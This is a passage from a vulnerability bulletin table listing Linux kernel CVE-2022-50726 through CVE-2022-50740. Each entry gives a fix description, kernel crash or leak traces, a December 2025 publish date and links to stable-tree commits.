cpu_startup_entry+0x19/0x20 start_secondary+0x221/0x2b0 ? set_cpu_sibling_map+0x2070/0x2070 secondary_startup_64_no_verify+0xcd/0xdb </TASK> Allocated by task 49502: kasan_save_stack+0x1e/0x40 __kasan_kmalloc+0x81/0xa0 kvmalloc_node+0x48/0xe0 mlx5e_bulk_async_init+0x35/0x110 [mlx5_core] mlx5e_tls_priv_tx_list_cleanup+0x84/0x3e0 [mlx5_core] mlx5e_ktls_cleanup_tx+0x38f/0x760 [mlx5_core] mlx5e_cleanup_nic_tx+0xa7/0x100 [mlx5_core] mlx5e_detach_netdev+0x1c ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50726 | https://git.kernel.org/stable/c/69dd3ad406c49aa69ce4852c15231ac56af8caf9 https://git.kernel.org/stable/c/bbcc06933f35651294ea1e963757502312c2171f https://git.kernel.org/stable/c/ab3de780c176bb91995c6166a576b370d9726e17 https://git.kernel.org/stable/c/0aa3ee1e4e5c9ed5dda11249450d609c3072c54e https://git.kernel.org/stable/c/bacd22df95147ed673bec4692ab2d4d585935241 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: efct: Fix possible memleak in efct_device_init() In efct_device_init(), when efct_scsi_reg_fc_transport() fails, efct_scsi_tgt_driver_exit() is not called to release the memory allocated by efct_scsi_tgt_driver_init(), which causes a memleak: unreferenced object 0xffff8881020ce000 (size 2048): comm "modprobe", pid 465, jiffies 4294928222 (age 55.872s) backtrace: [<0000000021a1ef1b>] kmalloc_trace+0x27/0x110 [<000000004c3ed51c>] target_register_template+0x4fd/0x7b0 [target_core_mod] [<00000000f3393296>] efct_scsi_tgt_driver_init+0x18/0x50 [efct] [<00000000115de533>] 0xffffffffc0d90011 [<00000000d608f646>] do_one_initcall+0xd0/0x4e0 [<0000000067828cf1>] do_init_module+0x1cc/0x6a0 ... | 2025-12-24 | not yet calculated | CVE-2022-50727 | https://git.kernel.org/stable/c/038359eeccffaf0de4c1c9c51ee19cc5649619a1 https://git.kernel.org/stable/c/0c6e6bb30229b1297ac0fd7ede2941d2322fc736 https://git.kernel.org/stable/c/c7e96168a8ca3be96c4959475164bef31115f07e https://git.kernel.org/stable/c/bb0cd225dd37df1f4a22e36dad59ff33178ecdfc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/lcs: Fix return type of lcs_start_xmit() With clang's kernel control flow integrity (kCFI, CONFIG_CFI_CLANG), indirect call targets are validated against the expected function pointer prototype to make sure the call target is valid to help mitigate ROP attacks. If they are not identical, there is a failure at run time, which manifests as either a kernel panic or thread getting killed. A proposed warning in clang aims to catch these at compile time, which reveals: drivers/s390/net/lcs.c:2090:21: error: incompatible function pointer types initializing 'netdev_tx_t (*)(struct sk_buff *, struct net_device *)' (aka 'enum netdev_tx (*)(struct sk_buff *, struct net_device *)') with an expression of type 'int (struct sk_buff *, struct net_device *)' [-Werror,-Wincompatible-function-pointer-types-strict] .ndo_start_xmit = lcs_start_xmit, ^~~~~~~~~~~~~~ drivers/s390/net/lcs.c:2097:21: error: incompatible function pointer types initializing 'netdev_tx_t (*)(struct sk_buff *, struct net_device *)' (aka 'enum netdev_tx (*)(struct sk_buff *, struct net_device *)') with an expression of type 'int (struct sk_buff *, struct net_device *)' [-Werror,-Wincompatible-function-pointer-types-strict] .ndo_start_xmit = lcs_start_xmit, ^~~~~~~~~~~~~~ ->ndo_start_xmit() in 'struct net_device_ops' expects a return type of 'netdev_tx_t', not 'int'. Adjust the return type of lcs_start_xmit() to match the prototype's to resolve the warning and potential CFI failure, should s390 select ARCH_SUPPORTS_CFI_CLANG in the future. | 2025-12-24 | not yet calculated | CVE-2022-50728 | https://git.kernel.org/stable/c/7b4da3fcd513b8e67823eb80da37aad99b3339c1 https://git.kernel.org/stable/c/d49cc2b705711fb8fb849e7c660929b2100360b7 https://git.kernel.org/stable/c/e684215d8a903752e2b0cc946517fb61e57a880a https://git.kernel.org/stable/c/20022d551f2064a194d8e0acb6cd7a85094a17b2 https://git.kernel.org/stable/c/ebc3c77785dc8b5b626309c0032a38fbb139287a https://git.kernel.org/stable/c/5ad774fb823c24bbeb21a15a67103ea7a6f5b928 https://git.kernel.org/stable/c/69669820844f81a77b6db24b86581320ae4d17af https://git.kernel.org/stable/c/cda74cdc280ba35c8993e7517bac5c257ff36f18 https://git.kernel.org/stable/c/bb16db8393658e0978c3f0d30ae069e878264fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix resource leak in ksmbd_session_rpc_open() When ksmbd_rpc_open() fails then it must call ksmbd_rpc_id_free() to undo the result of ksmbd_ipc_id_alloc(). | 2025-12-24 | not yet calculated | CVE-2022-50729 | https://git.kernel.org/stable/c/31c1b5d3000cdff70b98d5af045271e09079bec1 https://git.kernel.org/stable/c/9cb49b95c05df09b369d1ec1f378b5c92109433c https://git.kernel.org/stable/c/f9ed133381eba883c5e0059063d5b3ca7cac6d41 https://git.kernel.org/stable/c/bc044414fa0326a4e5c3c509c00b1fcaf621b5f4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: silence the warning when evicting inode with dioread_nolock When evicting an inode with default dioread_nolock, it could be raced by the unwritten extents converting kworker after writeback of some newly allocated dirty blocks. It converts unwritten extents to written; the extents could be merged to the upper level, freeing extent blocks, so it could mark the inode dirty again even though this inode has been marked I_FREEING. But the inode->i_io_list check and warning in ext4_evict_inode() miss this corner case. Fortunately, ext4_evict_inode() will wait for all extent conversions to finish before this check, so it will not lead to an inode use-after-free problem; everything is OK besides this warning. The WARN_ON_ONCE was originally designed for finding inode use-after-free issues in advance, but if we add the current dioread_nolock case in, it will become not quite useful, so fix this warning by just removing this check. ====== WARNING: CPU: 7 PID: 1092 at fs/ext4/inode.c:227 ext4_evict_inode+0x875/0xc60 ... RIP: 0010:ext4_evict_inode+0x875/0xc60 ... Call Trace: <TASK> evict+0x11c/0x2b0 iput+0x236/0x3a0 do_unlinkat+0x1b4/0x490 __x64_sys_unlinkat+0x4c/0xb0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x46/0xb0 RIP: 0033:0x7fa933c1115b ====== rm kworker ext4_end_io_end() vfs_unlink() ext4_unlink() ext4_convert_unwritten_io_end_vec() ext4_convert_unwritten_extents() ext4_map_blocks() ext4_ext_map_blocks() ext4_ext_try_to_merge_up() __mark_inode_dirty() check !I_FREEING locked_inode_to_wb_and_lock_list() iput() iput_final() evict() ext4_evict_inode() truncate_inode_pages_final() //wait release io_end inode_io_list_move_locked() ext4_release_io_end() trigger WARN_ON_ONCE() | 2025-12-24 | not yet calculated | CVE-2022-50730 | https://git.kernel.org/stable/c/bdc698ce91f232fd5eb11d2373e9f82f687314b8 https://git.kernel.org/stable/c/0d041b7251c13679a0f6c7926751ce1d8a7237c1 https://git.kernel.org/stable/c/3b893cc9a8d8b4e486a6639f5e107b56b7197d2e https://git.kernel.org/stable/c/b085fb43feede48ebf80ab7e2dd150c8d9902932 https://git.kernel.org/stable/c/bc12ac98ea2e1b70adc6478c8b473a0003b659d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: akcipher - default implementation for setting a private key Changes from v1: * removed the default implementation from set_pub_key: it is assumed that an implementation must always have this callback defined, as there is no use case for an algorithm which doesn't need a public key Many akcipher implementations (like ECDSA) support only signature verifications, so they don't have all callbacks defined. Commit 78a0324f4a53 ("crypto: akcipher - default implementations for request callbacks") introduced default callbacks for sign/verify operations, which just return an error code. However, these are not enough, because before calling sign the caller would likely call set_priv_key first on the instantiated transform (as the in-kernel testmgr does). This function does not have a default stub, so the kernel crashes when trying to set a private key on an akcipher which doesn't support signature generation. I've noticed this when trying to add a KAT vector for ECDSA signature to the testmgr. With this patch the testmgr returns an error in dmesg (as it should) instead of crashing the kernel with a NULL ptr dereference. | 2025-12-24 | not yet calculated | CVE-2022-50731 | https://git.kernel.org/stable/c/95c4e20adc3ea00d1594a2a05d9b187ed12ffa8e https://git.kernel.org/stable/c/a1354bdd191d533211b7cb723aa76a66f516f197 https://git.kernel.org/stable/c/779a9930f3e152c82699feb389a0e6d6644e747e https://git.kernel.org/stable/c/85bc736a18b872f54912e8bb70682d11770aece0 https://git.kernel.org/stable/c/f9058178597059d6307efe96a7916600f8ede08c https://git.kernel.org/stable/c/bc155c6c188c2f0c5749993b1405673d25a80389 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8192u: Fix use after free in ieee80211_rx() We cannot dereference the "skb" pointer after calling ieee80211_monitor_rx(), because it is a use after free. | 2025-12-24 | not yet calculated | CVE-2022-50732 | https://git.kernel.org/stable/c/9c03db0ec84b7964a11b20706665c99a5fead332 https://git.kernel.org/stable/c/fdc62d31d50e4ce5d8f363fcb8299ba0e00ee6fd https://git.kernel.org/stable/c/a0df8d44b555ae09729d6533fd4532977563c7b9 https://git.kernel.org/stable/c/288ada16a93aab5aa2ebea8190aafdb35b716854 https://git.kernel.org/stable/c/daa8045a991363ccdae5615d170f35aa1135e7a7 https://git.kernel.org/stable/c/b0aaec894a909c88117c8bda6c7c9b26cf7c744b https://git.kernel.org/stable/c/de174163c0d319ff06d622e79130a0017c8f5a6e https://git.kernel.org/stable/c/73df1172bbcc8d45cd28e3b1a9ca2edb2f9f7ce6 https://git.kernel.org/stable/c/bcc5e2dcf09089b337b76fc1a589f6ff95ca19ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: idmouse: fix an uninit-value in idmouse_open In idmouse_create_image, if any ftip_command fails, it will go to the reset label. However, this leaves the data in bulk_in_buffer[HEADER..IMGSIZE] uninitialized, and the check for a valid image incurs an uninitialized dereference. Fix this by moving the check before the reset label, since this check is only valid if the data after bulk_in_buffer[HEADER] has concrete data. Note that this is found by KMSAN, so only kernel compilation is tested. | 2025-12-24 | not yet calculated | CVE-2022-50733 | https://git.kernel.org/stable/c/b3304a6df957cc89a0590cb505388d659bf3db4c https://git.kernel.org/stable/c/7dad42032f68718259590b0cc7654e9a95ff9762 https://git.kernel.org/stable/c/f589b667567fde4f81d6e6c40f42b9f2224690ea https://git.kernel.org/stable/c/1eae30c0113dde7522088231584d62415011a035 https://git.kernel.org/stable/c/b8bbae3236ab7dccc66c42bc3f7cdbcfc0786e54 https://git.kernel.org/stable/c/20b8c456df584ebb2387dc23d40ebe4ff334417c https://git.kernel.org/stable/c/6163a5ae097bc78fa26c243fb384537e25610fd7 https://git.kernel.org/stable/c/adad163d1cff248a5df9f7cec50158e6ca89f33b https://git.kernel.org/stable/c/bce2b0539933e485d22d6f6f076c0fcd6f185c4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmem: core: Fix memleak in nvmem_register() dev_set_name will alloc memory for nvmem->dev.kobj.name in nvmem_register; when nvmem_validate_keepouts fails, nvmem's memory will be freed and the function returns, but nobody will free the memory for nvmem->dev.kobj.name, so there will be a memleak. So move nvmem_validate_keepouts() after device_register() and let the device core deal with cleaning up the name in error cases. | 2025-12-24 | not yet calculated | CVE-2022-50734 | https://git.kernel.org/stable/c/9391cc3a787a58aa224a6440d7f244d780ba2896 https://git.kernel.org/stable/c/2bd2774df0ce37920b23819a860a66fdbdd90823 https://git.kernel.org/stable/c/b6054b9b239a493672f853b034570cca93ba7a88 https://git.kernel.org/stable/c/bd1244561fa2a4531ded40dbf09c9599084f8b29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: do not run mt76u_status_worker if the device is not running Fix the following NULL pointer dereference by not running the mt76u_status_worker thread if the device is not running yet. KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 98 Comm: kworker/u2:2 Not tainted 5.14.0+ #78 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.1-0-ga5cab58e9a3f-prebuilt.qemu.org 04/01/2014 Workqueue: mt76 mt76u_tx_status_data RIP: 0010:mt76x02_mac_fill_tx_status.isra.0+0x82c/0x9e0 Code: c5 48 b8 00 00 00 00 00 fc ff df 80 3c 02 00 0f 85 94 01 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 34 24 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 89 01 00 00 41 8b 16 41 0f b7 RSP: 0018:ffffc900005af988 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffc900005afae8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff832fc661 RDI: ffffc900005afc2a RBP: ffffc900005afae0 R08: 0000000000000001 R09: fffff520000b5f3c R10: 0000000000000003 R11: fffff520000b5f3b R12: ffff88810b6132d8 R13: 000000000000ffff R14: 0000000000000000 R15: ffffc900005afc28 FS: 0000000000000000(0000) GS:ffff88811aa00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa0eda6a000 CR3: 0000000118f17000 CR4: 0000000000750ef0 PKRU: 55555554 Call Trace: mt76x02_send_tx_status+0x1d2/0xeb0 mt76x02_tx_status_data+0x8e/0xd0 mt76u_tx_status_data+0xe1/0x240 process_one_work+0x92b/0x1460 worker_thread+0x95/0xe00 kthread+0x3a1/0x480 ret_from_fork+0x1f/0x30 Modules linked in: --[ end trace 8df5d20fc5040f65 ]-- RIP: 0010:mt76x02_mac_fill_tx_status.isra.0+0x82c/0x9e0 Code: c5 48 b8 00 00 00 00 00 fc ff df 80 3c 02 00 0f 85 94 01 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 34 24 4c 89 f2 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 89 01 00 00 41 8b 16 41 0f b7 RSP: 0018:ffffc900005af988 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffffc900005afae8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff832fc661 RDI: ffffc900005afc2a RBP: ffffc900005afae0 R08: 0000000000000001 R09: fffff520000b5f3c R10: 0000000000000003 R11: fffff520000b5f3b R12: ffff88810b6132d8 R13: 000000000000ffff R14: 0000000000000000 R15: ffffc900005afc28 FS: 0000000000000000(0000) GS:ffff88811aa00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa0eda6a000 CR3: 0000000118f17000 CR4: 0000000000750ef0 PKRU: 55555554 Moreover, move the stat_work schedule out of the for loop. | 2025-12-24 | not yet calculated | CVE-2022-50735 | https://git.kernel.org/stable/c/69346de0eb956fb92949b9473de4647d9c34a54f https://git.kernel.org/stable/c/58fdd84a89b121b761dbfb8a196356e007376ca4 https://git.kernel.org/stable/c/f5ac749a0b21beee55d87d0b05de36976b22dff9 https://git.kernel.org/stable/c/bd5dac7ced5a7c9faa4dc468ac9560c3256df845 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Fix immediate work request flush to completion queue Correctly set the send queue element opcode during immediate work request flushing in the post sendqueue operation, if the QP is in ERROR state. An undefined opcode value results in out-of-bounds access to an array for mapping the opcode between siw internal and RDMA core representation in work completion generation. It resulted in a KASAN BUG report of type 'global-out-of-bounds' during NFSoRDMA testing. This patch further fixes a potential case of a malicious user who may write undefined values for completion queue element status or opcode, if the CQ is memory mapped to user land. It avoids the same out-of-bounds access to the arrays for status and opcode mapping as described above. | 2025-12-24 | not yet calculated | CVE-2022-50736 | https://git.kernel.org/stable/c/6af043089d3f1210776d19b6fdabea610d4c7699 https://git.kernel.org/stable/c/75af03fdf35acf15a3977f7115f6b8d10dff4bc7 https://git.kernel.org/stable/c/f8d8fbd3b6d6cc3f25790cca5cffe8ded512fef6 https://git.kernel.org/stable/c/355d2eca68c10d713a42f68e62044b3d1c300471 https://git.kernel.org/stable/c/f3d26a8589dfdeff328779b511f71fb90b10005e https://git.kernel.org/stable/c/bdf1da5df9da680589a7f74448dd0a94dd3e1446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Validate index root when initialize NTFS security This enhances the sanity check for $SDH and $SII while initializing NTFS security, guaranteeing these index roots are legitimate. [ 162.459513] BUG: KASAN: use-after-free in hdr_find_e.isra.0+0x10c/0x320 [ 162.460176] Read of size 2 at addr ffff8880037bca99 by task mount/243 [ 162.460851] [ 162.461252] CPU: 0 PID: 243 Comm: mount Not tainted 6.0.0-rc7 #42 [ 162.461744] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 162.462609] Call Trace: [ 162.462954] <TASK> [ 162.463276] dump_stack_lvl+0x49/0x63 [ 162.463822] print_report.cold+0xf5/0x689 [ 162.464608] ? unwind_get_return_address+0x3a/0x60 [ 162.465766] ? hdr_find_e.isra.0+0x10c/0x320 [ 162.466975] kasan_report+0xa7/0x130 [ 162.467506] ? _raw_spin_lock_irq+0xc0/0xf0 [ 162.467998] ? hdr_find_e.isra.0+0x10c/0x320 [ 162.468536] __asan_load2+0x68/0x90 [ 162.468923] hdr_find_e.isra.0+0x10c/0x320 [ 162.469282] ? cmp_uints+0xe0/0xe0 [ 162.469557] ? cmp_sdh+0x90/0x90 [ 162.469864] ? ni_find_attr+0x214/0x300 [ 162.470217] ? ni_load_mi+0x80/0x80 [ 162.470479] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 162.470931] ? ntfs_bread_run+0x190/0x190 [ 162.471307] ? indx_get_root+0xe4/0x190 [ 162.471556] ? indx_get_root+0x140/0x190 [ 162.471833] ? indx_init+0x1e0/0x1e0 [ 162.472069] ? fnd_clear+0x115/0x140 [ 162.472363] ? _raw_spin_lock_irqsave+0x100/0x100 [ 162.472731] indx_find+0x184/0x470 [ 162.473461] ? sysvec_apic_timer_interrupt+0x57/0xc0 [ 162.474429] ? indx_find_buffer+0x2d0/0x2d0 [ 162.474704] ? do_syscall_64+0x3b/0x90 [ 162.474962] dir_search_u+0x196/0x2f0 [ 162.475381] ? ntfs_nls_to_utf16+0x450/0x450 [ 162.475661] ? ntfs_security_init+0x3d6/0x440 [ 162.475906] ? is_sd_valid+0x180/0x180 [ 162.476191] ntfs_extend_init+0x13f/0x2c0 [ 162.476496] ? ntfs_fix_post_read+0x130/0x130 [ 162.476861] ? iput.part.0+0x286/0x320 [ 162.477325] ntfs_fill_super+0x11e0/0x1b50 [ 162.477709] ? put_ntfs+0x1d0/0x1d0 [ 162.477970] ? vsprintf+0x20/0x20 [ 162.478258] ? set_blocksize+0x95/0x150 [ 162.478538] get_tree_bdev+0x232/0x370 [ 162.478789] ? put_ntfs+0x1d0/0x1d0 [ 162.479038] ntfs_fs_get_tree+0x15/0x20 [ 162.479374] vfs_get_tree+0x4c/0x130 [ 162.479729] path_mount+0x654/0xfe0 [ 162.480124] ? putname+0x80/0xa0 [ 162.480484] ? finish_automount+0x2e0/0x2e0 [ 162.480894] ? putname+0x80/0xa0 [ 162.481467] ? kmem_cache_free+0x1c4/0x440 [ 162.482280] ? putname+0x80/0xa0 [ 162.482714] do_mount+0xd6/0xf0 [ 162.483264] ? path_mount+0xfe0/0xfe0 [ 162.484782] ? __kasan_check_write+0x14/0x20 [ 162.485593] __x64_sys_mount+0xca/0x110 [ 162.486024] do_syscall_64+0x3b/0x90 [ 162.486543] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 162.487141] RIP: 0033:0x7f9d374e948a [ 162.488324] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 162.489728] RSP: 002b:00007ffe30e73d18 EFLAGS: 00000206 ORIG_RAX: 00000000000000a5 [ 162.490971] RAX: ffffffffffffffda RBX: 0000561cdb43a060 RCX: 00007f9d374e948a [ 162.491669] RDX: 0000561cdb43a260 RSI: 0000561cdb43a2e0 RDI: 0000561cdb442af0 [ 162.492050] RBP: 0000000000000000 R08: 0000561cdb43a280 R09: 0000000000000020 [ 162.492459] R10: 00000000c0ed0000 R11: 0000000000000206 R12: 0000561cdb442af0 [ 162.493183] R13: 0000561cdb43a260 R14: 0000000000000000 R15: 00000000ffffffff [ 162.493644] </TASK> [ 162.493908] [ 162.494214] The buggy address belongs to the physical page: [ 162.494761] page:000000003e38a3d5 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x37bc [ 162.496064] flags: 0xfffffc0000000(node=0|zone=1|lastcpupid=0x1fffff) [ 162.497278] raw: 000fffffc0000000 ffffea00000df1c8 ffffea00000df008 0000000000000000 [ 162.498928] raw: 0000000000000000 0000000000240000 0 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50737 | https://git.kernel.org/stable/c/d7ce7bb6881aae186e50f57eea935cff8d504751 https://git.kernel.org/stable/c/24ee53c6bce15500db22f2a7aee9dd830e806c90 https://git.kernel.org/stable/c/d6379ce242960a8e9ecd6ff76f476d9336c21f16 https://git.kernel.org/stable/c/bfcdbae0523bd95eb75a739ffb6221a37109881e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost-vdpa: fix an iotlb memory leak Before commit 3d5698793897 ("vhost-vdpa: introduce asid based IOTLB") we called vhost_vdpa_iotlb_unmap(v, iotlb, 0ULL, 0ULL - 1) during release to free all the resources allocated when processing user IOTLB messages through vhost_vdpa_process_iotlb_update(). That commit changed the handling of IOTLB a bit, and we accidentally removed some code called during the release. We partially fixed this with commit 037d4305569a ("vhost-vdpa: call vhost_vdpa_cleanup during the release") but a potential memory leak is still there, as shown by kmemleak if the application does not send VHOST_IOTLB_INVALIDATE or crashes: unreferenced object 0xffff888007fbaa30 (size 16): comm "blkio-bench", pid 914, jiffies 4294993521 (age 885.500s) hex dump (first 16 bytes): 40 73 41 07 80 88 ff ff 00 00 00 00 00 00 00 00 @sA............. backtrace: [<0000000087736d2a>] kmem_cache_alloc_trace+0x142/0x1c0 [<0000000060740f50>] vhost_vdpa_process_iotlb_msg+0x68c/0x901 [vhost_vdpa] [<0000000083e8e205>] vhost_chr_write_iter+0xc0/0x4a0 [vhost] [<000000008f2f414a>] vhost_vdpa_chr_write_iter+0x18/0x20 [vhost_vdpa] [<00000000de1cd4a0>] vfs_write+0x216/0x4b0 [<00000000a2850200>] ksys_write+0x71/0xf0 [<00000000de8e720b>] __x64_sys_write+0x19/0x20 [<0000000018b12cbb>] do_syscall_64+0x3f/0x90 [<00000000986ec465>] entry_SYSCALL_64_after_hwframe+0x63/0xcd Let's fix this by calling vhost_vdpa_iotlb_unmap() on the whole range in vhost_vdpa_remove_as(). We move that call before vhost_dev_cleanup() since we need a valid v->vdev.mm in vhost_vdpa_pa_unmap(). The vhost_iotlb_reset() call can be removed, since vhost_vdpa_iotlb_unmap() on the whole range removes all the entries. The kmemleak log reported was observed with a vDPA device that has `use_va` set to true (e.g. VDUSE). This patch has been tested with both types of devices. | 2025-12-24 | not yet calculated | CVE-2022-50738 | https://git.kernel.org/stable/c/4e92cb33bfb51eee5f28bb10846c46f266a4bb67 https://git.kernel.org/stable/c/a2907867e2c86067accd2f011d6f23ee5533aa6c https://git.kernel.org/stable/c/c070c1912a83432530cbb4271d5b9b11fa36b67a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add null pointer check for inode operations This adds a sanity check for the i_op pointer of the inode which is returned after reading the Root directory MFT record. We should check that i_op is valid before trying to create the root dentry, otherwise we may encounter an NPD while mounting an image with a funny Root directory MFT record. [ 114.484325] BUG: kernel NULL pointer dereference, address: 0000000000000008 [ 114.484811] #PF: supervisor read access in kernel mode [ 114.485084] #PF: error_code(0x0000) - not-present page [ 114.485606] PGD 0 P4D 0 [ 114.485975] Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI [ 114.486570] CPU: 0 PID: 237 Comm: mount Tainted: G B 6.0.0-rc4 #28 [ 114.486977] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 114.488169] RIP: 0010:d_flags_for_inode+0xe0/0x110 [ 114.488816] Code: 24 f7 ff 49 83 3e 00 74 41 41 83 cd 02 66 44 89 6b 02 eb 92 48 8d 7b 20 e8 6d 24 f7 ff 4c 8b 73 20 49 8d 7e 08 e8 60 241 [ 114.490326] RSP: 0018:ffff8880065e7aa8 EFLAGS: 00000296 [ 114.490695] RAX: 0000000000000001 RBX: ffff888008ccd750 RCX: ffffffff84af2aea [ 114.490986] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffffffff87abd020 [ 114.491364] RBP: ffff8880065e7ac8 R08: 0000000000000001 R09: fffffbfff0f57a05 [ 114.491675] R10: ffffffff87abd027 R11: fffffbfff0f57a04 R12: 0000000000000000 [ 114.491954] R13: 0000000000000008 R14: 0000000000000000 R15: ffff888008ccd750 [ 114.492397] FS: 00007fdc8a627e40(0000) GS:ffff888058200000(0000) knlGS:0000000000000000 [ 114.492797] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 114.493150] CR2: 0000000000000008 CR3: 00000000013ba000 CR4: 00000000000006f0 [ 114.493671] Call Trace: [ 114.493890] <TASK> [ 114.494075] __d_instantiate+0x24/0x1c0 [ 114.494505] d_instantiate.part.0+0x35/0x50 [ 114.494754] d_make_root+0x53/0x80 [ 114.494998] ntfs_fill_super+0x1232/0x1b50 [ 114.495260] ? put_ntfs+0x1d0/0x1d0 [ 114.495499] ? vsprintf+0x20/0x20 [ 114.495723] ? set_blocksize+0x95/0x150 [ 114.495964] get_tree_bdev+0x232/0x370 [ 114.496272] ? put_ntfs+0x1d0/0x1d0 [ 114.496502] ntfs_fs_get_tree+0x15/0x20 [ 114.496859] vfs_get_tree+0x4c/0x130 [ 114.497099] path_mount+0x654/0xfe0 [ 114.497507] ? putname+0x80/0xa0 [ 114.497933] ? finish_automount+0x2e0/0x2e0 [ 114.498362] ? putname+0x80/0xa0 [ 114.498571] ? kmem_cache_free+0x1c4/0x440 [ 114.498819] ? putname+0x80/0xa0 [ 114.499069] do_mount+0xd6/0xf0 [ 114.499343] ? path_mount+0xfe0/0xfe0 [ 114.499683] ? __kasan_check_write+0x14/0x20 [ 114.500133] __x64_sys_mount+0xca/0x110 [ 114.500592] do_syscall_64+0x3b/0x90 [ 114.500930] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 114.501294] RIP: 0033:0x7fdc898e948a [ 114.501542] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 114.502716] RSP: 002b:00007ffd793e58f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000a5 [ 114.503175] RAX: ffffffffffffffda RBX: 0000564b2228f060 RCX: 00007fdc898e948a [ 114.503588] RDX: 0000564b2228f260 RSI: 0000564b2228f2e0 RDI: 0000564b22297ce0 [ 114.504925] RBP: 0000000000000000 R08: 0000564b2228f280 R09: 0000000000000020 [ 114.505484] R10: 00000000c0ed0000 R11: 0000000000000202 R12: 0000564b22297ce0 [ 114.505823] R13: 0000564b2228f260 R14: 0000000000000000 R15: 00000000ffffffff [ 114.506562] </TASK> [ 114.506887] Modules linked in: [ 114.507648] CR2: 0000000000000008 [ 114.508884] ---[ end trace 0000000000000000 ]--- [ 114.509675] RIP: 0010:d_flags_for_inode+0xe0/0x110 [ 114.510140] Code: 24 f7 ff 49 83 3e 00 74 41 41 83 cd 02 66 44 89 6b 02 eb 92 48 8d 7b 20 e8 6d 24 f7 ff 4c 8b 73 20 49 8d 7e 08 e8 60 241 [ 114.511762] RSP: 0018:ffff8880065e7aa8 EFLAGS: 00000296 [ 114.512401] RAX: 0000000000000001 RBX: ffff888008ccd750 RCX: ffffffff84af2aea [ 114.51 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50739 | https://git.kernel.org/stable/c/f62506f5e45afbb01c84c3f28a2878b320a0b0f7 https://git.kernel.org/stable/c/9f24743ddcdd3683b0a6b16e1439ad091dc3489b https://git.kernel.org/stable/c/a7b23037b38b577d9a4372e0c6b7c9fe808070c1 https://git.kernel.org/stable/c/c1ca8ef0262b25493631ecbd9cb8c9893e1481a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: hif_usb: fix memory leak of urbs in ath9k_hif_usb_dealloc_tx_urbs() Syzkaller reports a long-known leak of urbs in ath9k_hif_usb_dealloc_tx_urbs(). The cause of the leak is that usb_get_urb() is called but usb_free_urb() (or usb_put_urb()) is not called inside usb_kill_urb() as urb->dev or urb->ep fields have not been initialized and usb_kill_urb() returns immediately. The patch removes trying to kill urbs located in hif_dev->tx.tx_buf because hif_dev->tx.tx_buf is not supposed to contain urbs which are in pending state (the pending urbs are stored in hif_dev->tx.tx_pending). The tx.tx_lock is acquired so there should not be any changes in the list. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-24 | not yet calculated | CVE-2022-50740 | https://git.kernel.org/stable/c/134ae5eba41294eff76e4be20d6001b8f0192207 https://git.kernel.org/stable/c/472312fef2b9eccaa03bd59e0ab2527da945e736 https://git.kernel.org/stable/c/eddbb8f7620f9f8008b090a6e10c460074ca575a https://git.kernel.org/stable/c/9850791d389b342ae6e573fe8198db0b4d338352 https://git.kernel.org/stable/c/c3fb3e9a2c0c1a0fa492d90eb19bcfa92a5f884d https://git.kernel.org/stable/c/d856f7574bcc1d81de565a857caf32f122cd7ce0 https://git.kernel.org/stable/c/c05189a429fdb371dd455c3c466d67ac2ebff152 https://git.kernel.org/stable/c/08aa0537ec8cf29ceccae98acc1a534fc12598c1 